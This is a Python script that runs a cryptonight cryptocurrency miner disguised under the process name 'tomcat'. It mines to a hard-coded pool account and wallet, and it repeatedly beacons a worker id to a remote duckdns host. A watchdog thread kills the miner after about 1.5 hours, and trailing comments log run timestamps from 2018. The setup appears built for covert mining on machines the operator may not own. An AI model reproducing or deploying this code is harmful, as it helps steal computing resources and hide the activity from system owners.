import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:01.810752
#2018-02-17 17:02:06.305492
#2018-02-17 18:51:08.210670
#2018-02-17 20:39:07.014682
#2018-02-17 22:26:05.120287
#2018-02-18 00:09:04.045366
#2018-02-18 01:59:05.853828
#2018-02-18 03:46:07.518497
#2018-02-18 05:34:04.978610
#2018-02-18 07:27:06.227631
#2018-02-18 09:14:07.201139
#2018-02-18 11:01:01.961161
#2018-02-18 12:47:04.259663
#2018-02-18 14:36:06.322787
#2018-02-18 16:25:04.797849
#2018-02-18 18:14:05.397198
#2018-02-18 20:00:05.263826
#2018-02-18 21:47:01.922752
#2018-02-18 23:36:01.732986
#2018-02-19 01:22:03.293951
#2018-02-19 03:10:06.422584
#2018-02-19 04:55:05.828722
#2018-02-19 06:41:05.954110
#2018-02-19 08:31:03.914188
#2018-02-19 10:20:05.520470
#2018-02-19 12:08:04.346559
#2018-02-19 13:56:05.445669
#2018-02-19 15:45:09.083394
#2018-02-19 17:34:09.242569
#2018-02-19 19:22:04.006189
#2018-02-19 21:10:06.650590
#2018-02-19 22:57:01.963047
#2018-02-20 00:40:06.264758
#2018-02-20 02:31:06.140307
#2018-02-20 04:20:08.992806
#2018-02-20 06:04:06.555121
#2018-02-20 07:49:06.100468
#2018-02-20 09:34:06.809612
#2018-02-20 11:18:05.277330
#2018-02-20 13:06:05.964940
#2018-02-20 14:49:06.102617
#2018-02-20 16:34:09.249171
#2018-02-20 18:20:10.338046
#2018-02-20 20:11:05.901808
#2018-02-20 21:58:08.066114
#2018-02-20 23:40:01.749095
#2018-02-21 01:24:06.494623
#2018-02-21 03:12:05.441501
#2018-02-21 05:01:04.182639
#2018-02-21 06:49:04.884322
#2018-02-21 08:34:06.215851
#2018-02-21 10:19:05.847116
#2018-02-21 12:07:05.467953
#2018-02-21 13:55:04.096348
#2018-02-21 15:39:09.024769
#2018-02-21 17:32:01.383009
#2018-02-21 19:20:01.611586
#2018-02-21 21:08:07.239404
#2018-02-21 22:54:08.099590
#2018-02-22 00:42:07.605126
#2018-02-22 02:32:01.400731
#2018-02-22 04:18:05.466086
#2018-02-22 06:03:07.068065
#2018-02-22 07:49:05.176946
#2018-02-22 09:38:06.734351
#2018-02-22 11:23:04.352721
#2018-02-22 13:10:05.075613
#2018-02-22 15:01:05.615674
#2018-02-22 16:45:01.729179
#2018-02-22 18:31:01.652468
#2018-02-22 20:24:06.256739
#2018-02-22 22:10:09.426757
#2018-02-22 23:57:08.652318
#2018-02-23 01:46:08.564921
#2018-02-23 03:36:05.945888
#2018-02-23 05:20:01.764742
#2018-02-23 07:05:06.104360
#2018-02-23 08:53:04.252059
#2018-02-23 11:12:04.695803
#2018-02-23 13:06:06.939482
#2018-02-23 14:51:08.553160
#2018-02-23 16:40:08.819005
#2018-02-23 18:26:06.656205
#2018-02-23 20:10:11.612477
#2018-02-23 22:00:05.509078
#2018-02-23 23:47:06.532705
#2018-02-24 01:33:04.064740
#2018-02-24 03:24:01.773131
#2018-02-24 05:09:01.468768
#2018-02-24 06:57:01.435453
#2018-02-24 08:47:07.053782
#2018-02-24 10:47:06.434890
#2018-02-24 12:34:03.764272
#2018-02-24 14:23:01.977143
#2018-02-24 16:11:05.917945
#2018-02-24 18:03:03.809891
#2018-02-24 19:50:03.796864
#2018-02-24 22:53:07.121125
#2018-02-25 03:03:06.554936
#2018-02-25 06:52:01.424340